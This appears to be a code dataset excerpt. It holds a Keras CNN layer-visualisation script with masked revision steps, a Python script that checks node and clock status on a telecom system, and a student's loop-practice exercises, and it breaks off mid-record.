convout4 = Conv2D(128, kernel_size=3, strides=1)
model.add(convout4)
activ4 = Activation('relu')
model.add(activ4)
pool2 = MaxPooling2D(pool_size=2, strides=1)
model.add(pool2)
convout5 = Conv2D(256, kernel_size=3, strides=1)
model.add(convout5)
activ5 = Activation('relu')
model.add(activ5)
pool3 = MaxPooling2D(pool_size=2, strides=1)
model.add(pool3)
model.add(Flatten())
dense1 = Dense(256)
model.add(dense1)
activ6 = Activation('relu')
model.add(activ6)
batchn = BatchNormalization()
model.add(batchn)
dense2 = Dense(184)
model.add(dense2)
activ7 = Activation('softmax')
model.add(activ7)
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
img = cv2.imread('test.jpg')
img = cv2.resize(img, (64, 64))
img = np.expand_dims(img, axis=0)
classes = model.predict(img)
def layer_to_visualize(layer):
inputs = [K.learning_phase()] + model.inputs
_convout1_f = K.function(inputs, [layer.output])
def convout1_f(X):
# The [0] is to disable the training phase flag
return _convout1_f([0] + [X])
convolutions = convout1_f(img)
convolutions = np.squeeze(convolutions)
print ('Shape of conv:', convolutions.shape)
n = convolutions.shape[0]
n = int(np.ceil(np.sqrt(n)))
# Visualization of each filter of the layer
fig = plt.figure(figsize=(12,8))
for i in range(len(convolutions)):
ax = fig.add_subplot(n,n,i+1)
ax.imshow(convolutions[i], cmap='gray')
# Specify the layer to want to visualize
layer_to_visualize(convout1)
layer_to_visualize(activ1)
layer_to_visualize(convout2)
layer_to_visualize(activ2)
layer_to_visualize(pool1)
layer_to_visualize(convout3)
layer_to_visualize(activ3)
layer_to_visualize(convout4)
layer_to_visualize(activ4)
layer_to_visualize(pool2)
layer_to_visualize(convout5)
layer_to_visualize(activ5)
layer_to_visualize(pool3)
|
normal
|
{
"blob_id": "e47d6b5d46f2dd84569a2341178b2ea5e074603a",
"index": 7361,
"step-1": "<mask token>\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\n<mask token>\n",
"step-2": "<mask token>\nmatplotlib.use('agg')\n<mask token>\nif K.image_data_format() == 'channels_first':\n input_shape = 3, img_width, img_height\nelse:\n input_shape = img_width, img_height, 3\n<mask token>\nmodel.add(convout1)\n<mask token>\nmodel.add(activ1)\n<mask token>\nmodel.add(convout2)\n<mask token>\nmodel.add(activ2)\n<mask token>\nmodel.add(pool1)\n<mask token>\nmodel.add(convout3)\n<mask token>\nmodel.add(activ3)\n<mask token>\nmodel.add(convout4)\n<mask token>\nmodel.add(activ4)\n<mask token>\nmodel.add(pool2)\n<mask token>\nmodel.add(convout5)\n<mask token>\nmodel.add(activ5)\n<mask token>\nmodel.add(pool3)\nmodel.add(Flatten())\n<mask token>\nmodel.add(dense1)\n<mask token>\nmodel.add(activ6)\n<mask token>\nmodel.add(batchn)\n<mask token>\nmodel.add(dense2)\n<mask token>\nmodel.add(activ7)\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics\n =['accuracy'])\n<mask token>\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n",
"step-3": "<mask token>\nmatplotlib.use('agg')\n<mask token>\nimg_width, img_height = 64, 64\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/test'\nnb_train_samples = 25473\nnb_validation_samples = 7000\nepochs = 50\nbatch_size = 64\nif K.image_data_format() == 'channels_first':\n input_shape = 3, img_width, img_height\nelse:\n input_shape = img_width, img_height, 3\nmodel = Sequential()\nconvout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)\nmodel.add(convout1)\nactiv1 = Activation('relu')\nmodel.add(activ1)\nconvout2 = Conv2D(64, kernel_size=5, strides=1)\nmodel.add(convout2)\nactiv2 = Activation('relu')\nmodel.add(activ2)\npool1 = MaxPooling2D(pool_size=(3, 3), strides=1)\nmodel.add(pool1)\nconvout3 = Conv2D(128, kernel_size=4, strides=2)\nmodel.add(convout3)\nactiv3 = Activation('relu')\nmodel.add(activ3)\nconvout4 = Conv2D(128, kernel_size=3, strides=1)\nmodel.add(convout4)\nactiv4 = Activation('relu')\nmodel.add(activ4)\npool2 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool2)\nconvout5 = Conv2D(256, kernel_size=3, strides=1)\nmodel.add(convout5)\nactiv5 = Activation('relu')\nmodel.add(activ5)\npool3 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool3)\nmodel.add(Flatten())\ndense1 = Dense(256)\nmodel.add(dense1)\nactiv6 = Activation('relu')\nmodel.add(activ6)\nbatchn = BatchNormalization()\nmodel.add(batchn)\ndense2 = Dense(184)\nmodel.add(dense2)\nactiv7 = Activation('softmax')\nmodel.add(activ7)\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics\n =['accuracy'])\nimg = cv2.imread('test.jpg')\nimg = cv2.resize(img, (64, 64))\nimg = np.expand_dims(img, axis=0)\nclasses = model.predict(img)\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n",
"step-4": "import cv2\nimport numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import SeparableConv2D, Conv2D, MaxPooling2D\nfrom keras.layers import BatchNormalization, Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nimg_width, img_height = 64, 64\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/test'\nnb_train_samples = 25473\nnb_validation_samples = 7000\nepochs = 50\nbatch_size = 64\nif K.image_data_format() == 'channels_first':\n input_shape = 3, img_width, img_height\nelse:\n input_shape = img_width, img_height, 3\nmodel = Sequential()\nconvout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)\nmodel.add(convout1)\nactiv1 = Activation('relu')\nmodel.add(activ1)\nconvout2 = Conv2D(64, kernel_size=5, strides=1)\nmodel.add(convout2)\nactiv2 = Activation('relu')\nmodel.add(activ2)\npool1 = MaxPooling2D(pool_size=(3, 3), strides=1)\nmodel.add(pool1)\nconvout3 = Conv2D(128, kernel_size=4, strides=2)\nmodel.add(convout3)\nactiv3 = Activation('relu')\nmodel.add(activ3)\nconvout4 = Conv2D(128, kernel_size=3, strides=1)\nmodel.add(convout4)\nactiv4 = Activation('relu')\nmodel.add(activ4)\npool2 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool2)\nconvout5 = Conv2D(256, kernel_size=3, strides=1)\nmodel.add(convout5)\nactiv5 = Activation('relu')\nmodel.add(activ5)\npool3 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool3)\nmodel.add(Flatten())\ndense1 = Dense(256)\nmodel.add(dense1)\nactiv6 = Activation('relu')\nmodel.add(activ6)\nbatchn = BatchNormalization()\nmodel.add(batchn)\ndense2 = Dense(184)\nmodel.add(dense2)\nactiv7 = Activation('softmax')\nmodel.add(activ7)\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics\n =['accuracy'])\nimg = cv2.imread('test.jpg')\nimg = cv2.resize(img, (64, 64))\nimg = np.expand_dims(img, axis=0)\nclasses = model.predict(img)\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n",
"step-5": "import cv2\nimport numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import SeparableConv2D, Conv2D, MaxPooling2D\nfrom keras.layers import BatchNormalization, Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\n\n# dimensions of images.\nimg_width, img_height = 64,64 \n\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/test'\nnb_train_samples = 25473\nnb_validation_samples = 7000\nepochs = 50\nbatch_size = 64\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\nmodel = Sequential()\nconvout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)\nmodel.add(convout1)\nactiv1 = Activation('relu')\nmodel.add(activ1)\nconvout2 = Conv2D(64, kernel_size=5, strides=1)\nmodel.add(convout2)\nactiv2 = Activation('relu')\nmodel.add(activ2)\npool1 = MaxPooling2D(pool_size=(3, 3), strides=1)\nmodel.add(pool1)\n\nconvout3 = Conv2D(128, kernel_size=4, strides=2)\nmodel.add(convout3)\nactiv3 = Activation('relu')\nmodel.add(activ3)\nconvout4 = Conv2D(128, kernel_size=3, strides=1)\nmodel.add(convout4)\nactiv4 = Activation('relu')\nmodel.add(activ4)\npool2 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool2)\n\nconvout5 = Conv2D(256, kernel_size=3, strides=1)\nmodel.add(convout5)\nactiv5 = Activation('relu')\nmodel.add(activ5)\npool3 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool3)\n\nmodel.add(Flatten())\ndense1 = Dense(256)\nmodel.add(dense1)\nactiv6 = Activation('relu')\nmodel.add(activ6)\nbatchn = BatchNormalization()\nmodel.add(batchn)\ndense2 = Dense(184)\nmodel.add(dense2)\nactiv7 = Activation('softmax')\nmodel.add(activ7)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n\nimg = cv2.imread('test.jpg')\nimg = cv2.resize(img, (64, 64))\nimg = np.expand_dims(img, axis=0)\nclasses = model.predict(img)\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n\n _convout1_f = K.function(inputs, [layer.output])\n def convout1_f(X):\n # The [0] is to disable the training phase flag\n return _convout1_f([0] + [X])\n\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n\n print ('Shape of conv:', convolutions.shape)\n\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n\n # Visualization of each filter of the layer\n fig = plt.figure(figsize=(12,8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n,n,i+1)\n ax.imshow(convolutions[i], cmap='gray')\n\n# Specify the layer to want to visualize\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\n\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\n\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/python
import os
from subprocess import Popen, PIPE, STDOUT
import time
import re
import telnetlib
from get_sys_info import get_node_list, get_spec_node_list, get_active_tcu, get_ru_list, is_active_ru
g_rg_list = [
'/SGWNetMgr',
'/SS7SGU',
'/MGW_CMRG',
'/MGW_OMURG',
'/Directory',
]
status_dict={
"administrative": "UNLOCKED",
"operational": "ENABLED",
"usage": "ACTIVE",
"procedural": '',
"availability": '',
"unknown": "FALSE",
"alarm": '',
"role": "ACTIVE"
}
def get_mo_status(mo_name):
cmd = 'fshascli -s ' + mo_name
output = os.popen(cmd).readlines()
mo_status = {}
for line in output:
if len(line) > 1:
p = re.compile(r'(\S*)\((\S*)\)')
m = p.search(line)
if m:
mo_status[m.group(1)] = m.group(2)
return mo_status
def cmp_mo_status(mo_status):
ret = True
error_info = ''
for k, v in mo_status.items():
if k != 'role' and status_dict[k] != v :
error_info = " " + k + " should be \"" + status_dict[k] + "\" But is \"" + v +"\""
ret = False
return ret, error_info
return ret, error_info
def is_ru_active(mo_status):
return 'role' in mo_status and mo_status['role'] == 'ACTIVE'
def check_mo_status(mo_name, mo_status):
status, error_info = cmp_mo_status(mo_status)
if status:
print("%-40s OK"%(mo_name))
else:
print("%-40s NOK:"%(mo_name))
print(error_info)
return status
def check_mo_list(ru_list):
status = True
for ru in ru_list:
mo_status = get_mo_status(ru)
if is_ru_active(mo_status):
status = check_mo_status(ru, mo_status) and status
return status
def check_rg_status(rg_name):
# print("start to check RG " + rg_name + " ...")
mo_status = get_mo_status(rg_name)
status = check_mo_status(rg_name, mo_status)
if status:
ru_list = get_ru_list(rg_name)
if ru_list:
status = check_mo_list(ru_list) and status
return status
def check_clock():
cmd = 'fsclish -c "show mgw synchronization inputreference"'
ret = os.popen(cmd).read()
print(ret)
r_list = ret.split()
if 'yes' in r_list and 'ok' in r_list:
print("Clock is ok")
return True
else:
print "================================================================="
print "CLOCK IS NOT OK !!!"
print "================================================================="
return False
def is_needed_node_available(node_list):
num_tcu = 0
num_tdm = 0
num_cla = 1
for node in node_list:
if node.startswith("TCU"):
num_tcu += 1
if node.startswith("TDM"):
num_tdm += 1
# if node.startswith("CLA"):
# num_cla += 1
if num_tcu == 0:
print "No Working DSP available"
if num_tdm == 0:
print "No Working TDM available"
if num_cla == 0:
print "No Working CLA available"
return num_tcu and num_cla and num_tdm
def check_needed_rg(rg_list):
result = True
for rg in rg_list:
result = check_rg_status(rg) and result
return result
def check_node():
result = True
node_list = get_node_list()
if not is_needed_node_available(node_list):
print "Please first make the node working!"
return
for node in node_list:
if not check_rg_status("/"+node):
result = False
return result
def check_node_list(node_list):
result = True
for node in node_list:
result = check_rg_status("/"+node) and result
return result
def check_all(node_list_all):
ret = True
ret = check_needed_rg(g_rg_list) and ret
ret = check_node_list(node_list_all) and ret
ret = check_clock() and ret
return ret
def check_for_link(node_list_all):
tcu_list = get_spec_node_list(node_list_all, "TCU")
tdm_list = get_spec_node_list(node_list_all, "TDM")
active_tcu_list = get_active_tcu(tcu_list)
ret = True
ret = check_node_list(tdm_list) and ret
ret = check_node_list(active_tcu_list) and ret
ret = check_needed_rg(g_rg_list) and ret
check_clock()
return ret
from optparse import OptionParser
if __name__ == '__main__':
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option("-a", "--all",
action="store_true", dest="check_all_flag",
default=False)
opts, args = parser.parse_args()
node_list = get_node_list()
ret = False
if(opts.check_all_flag):
ret = check_all(node_list)
else:
ret = check_for_link(node_list)
# os.system('tail -f /srv/Log/log/syslog | grep srm')
if ret:
print ("Check ok")
else:
print("Not all check passed, please first check the RU and clock status")
|
normal
|
{
"blob_id": "603d904404ace88205a524d8bfbe3e621b65f425",
"index": 8750,
"step-1": "#!/usr/bin/python\nimport os\nfrom subprocess import Popen, PIPE, STDOUT\nimport time\nimport re\nimport telnetlib\nfrom get_sys_info import get_node_list, get_spec_node_list, get_active_tcu, get_ru_list, is_active_ru\ng_rg_list = [\n\t\t\t'/SGWNetMgr',\n\t\t\t'/SS7SGU',\n\t\t\t'/MGW_CMRG',\n\t\t\t'/MGW_OMURG',\n\t\t\t'/Directory',\n]\n\nstatus_dict={\n\t\"administrative\":\t\"UNLOCKED\",\n\t\"operational\":\t\t\"ENABLED\",\n\t\"usage\":\t\t\t\"ACTIVE\",\n\t\"procedural\":\t\t'',\n\t\"availability\":\t\t'',\n\t\"unknown\":\t\t\t\"FALSE\",\n\t\"alarm\":\t\t\t'',\n\t\"role\":\t\t\t\t\"ACTIVE\"\n}\n\ndef get_mo_status(mo_name):\n\tcmd = 'fshascli -s ' + mo_name\n\toutput = os.popen(cmd).readlines()\n\tmo_status = {}\n\tfor line in output:\n\t\tif len(line) > 1:\n\t\t\tp = re.compile(r'(\\S*)\\((\\S*)\\)')\n\t\t\tm = p.search(line)\n\t\t\tif m:\n\t\t\t\tmo_status[m.group(1)] = m.group(2)\n\treturn mo_status\n\n\ndef cmp_mo_status(mo_status):\n\tret = True\n\terror_info = ''\n\tfor k, v in mo_status.items():\n\t\tif k != 'role' and status_dict[k] != v :\n\t\t\terror_info = \" \" + k + \" should be \\\"\" + status_dict[k] + \"\\\" But is \\\"\" + v +\"\\\"\"\n\t\t\tret = False\n\t\t\treturn ret, error_info\n\treturn ret, error_info\n\ndef is_ru_active(mo_status):\n\treturn 'role' in mo_status and mo_status['role'] == 'ACTIVE'\n\n\t\ndef check_mo_status(mo_name, mo_status):\n\tstatus, error_info = cmp_mo_status(mo_status)\n\tif status:\n\t\tprint(\"%-40s OK\"%(mo_name))\n\telse:\n\t\tprint(\"%-40s NOK:\"%(mo_name))\n\t\tprint(error_info)\n\treturn status\n\t\t\n\ndef check_mo_list(ru_list):\n\tstatus = True\n\tfor ru in ru_list:\n\t\tmo_status = get_mo_status(ru)\n\t\tif is_ru_active(mo_status):\n\t\t\tstatus = check_mo_status(ru, mo_status) and status\n\treturn status\n\t\t\n\t\ndef check_rg_status(rg_name):\n#\tprint(\"start to check RG \" + rg_name + \" ...\")\n\tmo_status = get_mo_status(rg_name)\n\tstatus = check_mo_status(rg_name, mo_status)\n\n\tif status:\n\t\tru_list = get_ru_list(rg_name)\n\t\tif ru_list:\n\t\t\tstatus = check_mo_list(ru_list) and status\n\treturn status\n\n\ndef check_clock():\n\tcmd = 'fsclish -c \"show mgw synchronization inputreference\"'\n\tret = os.popen(cmd).read()\n\tprint(ret)\n\tr_list = ret.split()\n\tif 'yes' in r_list and 'ok' in r_list:\n\t\tprint(\"Clock is ok\")\n\t\treturn True\n\telse:\n\t\tprint \"=================================================================\"\n\t\tprint \"CLOCK IS NOT OK !!!\"\n\t\tprint \"=================================================================\"\n\t\treturn False\n\ndef is_needed_node_available(node_list):\n\tnum_tcu = 0\n\tnum_tdm = 0\n\tnum_cla = 1\n\tfor node in node_list:\n\t\tif node.startswith(\"TCU\"):\n\t\t\tnum_tcu += 1\n\t\tif node.startswith(\"TDM\"):\n\t\t\tnum_tdm += 1\n#\t\tif node.startswith(\"CLA\"):\n#\t\t\tnum_cla += 1\n\tif num_tcu == 0:\n\t\tprint \"No Working DSP available\"\n\tif num_tdm == 0:\n\t\tprint \"No Working TDM available\"\n\tif num_cla == 0:\n\t\tprint \"No Working CLA available\"\n\treturn num_tcu and num_cla and num_tdm\n\ndef check_needed_rg(rg_list):\n\tresult = True\n\tfor rg in rg_list:\n\t\tresult = check_rg_status(rg) and result\n\treturn result\n\t\ndef check_node():\n\tresult = True\n\tnode_list = get_node_list()\t\n\tif not is_needed_node_available(node_list):\n\t\tprint \"Please first make the node working!\"\n\t\treturn\n\tfor node in node_list:\n\t\tif not check_rg_status(\"/\"+node):\n\t\t\tresult = False\t\n\treturn result\n\ndef check_node_list(node_list):\n\tresult = True\n\tfor node in node_list:\n\t\tresult = check_rg_status(\"/\"+node) and result\n\treturn result\n\n\t\ndef check_all(node_list_all):\n\tret = True\n\tret = check_needed_rg(g_rg_list) and ret \n\tret = check_node_list(node_list_all) and ret\n\tret = check_clock() and ret \n\treturn ret\n\t\ndef check_for_link(node_list_all):\n\ttcu_list = get_spec_node_list(node_list_all, \"TCU\")\n\ttdm_list = get_spec_node_list(node_list_all, \"TDM\")\n\tactive_tcu_list = get_active_tcu(tcu_list)\n\tret = True\n\tret = check_node_list(tdm_list) and ret\n\tret = check_node_list(active_tcu_list) and ret\n\tret = check_needed_rg(g_rg_list) and ret\n\tcheck_clock()\n\treturn ret\n\n\nfrom optparse import OptionParser\n\nif __name__ == '__main__':\n usage = \"usage: %prog [options] arg\"\n parser = OptionParser(usage)\n parser.add_option(\"-a\", \"--all\",\n action=\"store_true\", dest=\"check_all_flag\",\n default=False)\n opts, args = parser.parse_args()\n node_list = get_node_list()\n ret = False\n if(opts.check_all_flag):\n\t ret = check_all(node_list)\n else:\n ret = check_for_link(node_list)\n#\t\tos.system('tail -f /srv/Log/log/syslog | grep srm')\n if ret:\n print (\"Check ok\")\n else:\n\t\tprint(\"Not all check passed, please first check the RU and clock status\")\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Kai Joseph
# Loop Practice
# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.
import sys
import random
''' 1.
Write a for loop that will print out all the integers from 0-4 in ascending order.
'''
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
''' 2.
Write a for loop that will print out all the integers from 0-4 in descending order.
'''
if sys.argv[1] == '2':
for x in range(5):
print(str(4-x))
''' 3.
Write a for loop that will print out all the integers from 5-15 in descending order.
'''
if sys.argv[1] == '3':
for x in range(11):
print(str(15-x))
''' 4.
Write a for loop that will print out all the integers from -5 to 5 in ascending order.
'''
if sys.argv[1] == '4':
for x in range(11):
print(str(-5+x))
''' 5.
Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.
'''
if sys.argv[1] == '5':
for x in range(25,50):
if x%2 != 0:
print(x)
for x in range(26):
if x%2 == 0:
print(str(25+x))
''' 6.
Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100
'''
if sys.argv[1] == '6':
for x in range(1,11):
print(str(x**2))
''' 8.
A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57.
'''
if sys.argv[1] == '8':
for x in range(4,58):
print(x)
days = 57-x
print("Days remaining to reach 57:",str(days))
''' 9.
A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).
'''
if sys.argv[1] == '9':
while True:
students = input("Number of students (excluding the girl): ")
jellybeans = input("Number of jelly beans: ")
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print("Please enter an integer for jelly beans and students.")
days = 0
while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
''' 17.
Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:
"1/2 = .5" "1/3 = .666666666667" etc.
'''
if sys.argv[1] == '17':
for x in range(2,21):
num = 1/x
print("1/"+str(x),"=",str(num))
''' 18.
Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).
'''
if sys.argv[1] == '18':
total = 0
for x in range(1,101):
total = total+x
print("Total: "+str(total))
avg = total/x
print("Average: " + str(avg))
''' 19.
A friend tells you that PI can be computed with the following equation:
PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)
Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. Are they right or wrong?
'''
if sys.argv[1] == '19':
it = int(input("Enter the number of iterations: "))
num = 0
for x in range(1,it*2):
if x%2 != 0:
if (x-3)%4 == 0:
num = num - (1/x)
else:
num = num + (1/x)
print(str(4*num))
''' 22.
Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print "Coza" in place of the numbers which are multiples of 3, "Loza" for multiples of 5, "Woza" for multiples of 7, "CozaLoza" for multiples of 3 and 5, and so on. Sample output:
1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11
Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22
23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza
......
'''
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1,111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ""
tampered = False
if int(numbers[x][y])%3 == 0:
word = word + "Coza"
tampered = True
if int(numbers[x][y])%5 == 0:
word = word + "Loza"
tampered = True
if int(numbers[x][y])%7 == 0:
word = word + "Woza"
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
''' 23.
Write code that will print out a times-table for practice and reference. It should look like this:
* | 1 2 3 4 5 6 7 8 9
-------------------------------
1 | 1 2 3 4 5 6 7 8 9
2 | 2 4 6 8 10 12 14 16 18
3 | 3 6 9 12 15 18 21 24 27
4 | 4 8 12 16 20 24 28 32 36
5 | 5 10 15 20 25 30 35 40 45
6 | 6 12 18 24 30 36 42 48 54
7 | 7 14 21 28 35 42 49 56 63
8 | 8 16 24 32 40 48 56 64 72
9 | 9 18 27 36 45 54 63 72 81
'''
if sys.argv[1] == '23':
x = [1,2,3,4,5,6,7,8,9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print((int(x[r])*int(y[z])),end=" ")
print("")
''' 25.
Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be "3 2 4 5 1", with a space separating the digits.
'''
if sys.argv[1] == '25':
number = input("Enter the number that you wish to reverse: ")
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number)-1-x])
for x in range(len(n)):
print(n[x],end=" ")
print("")
|
normal
|
{
"blob_id": "eda8bde048f3d4c4af4bd1c296e4cc02b92eaa17",
"index": 4727,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == 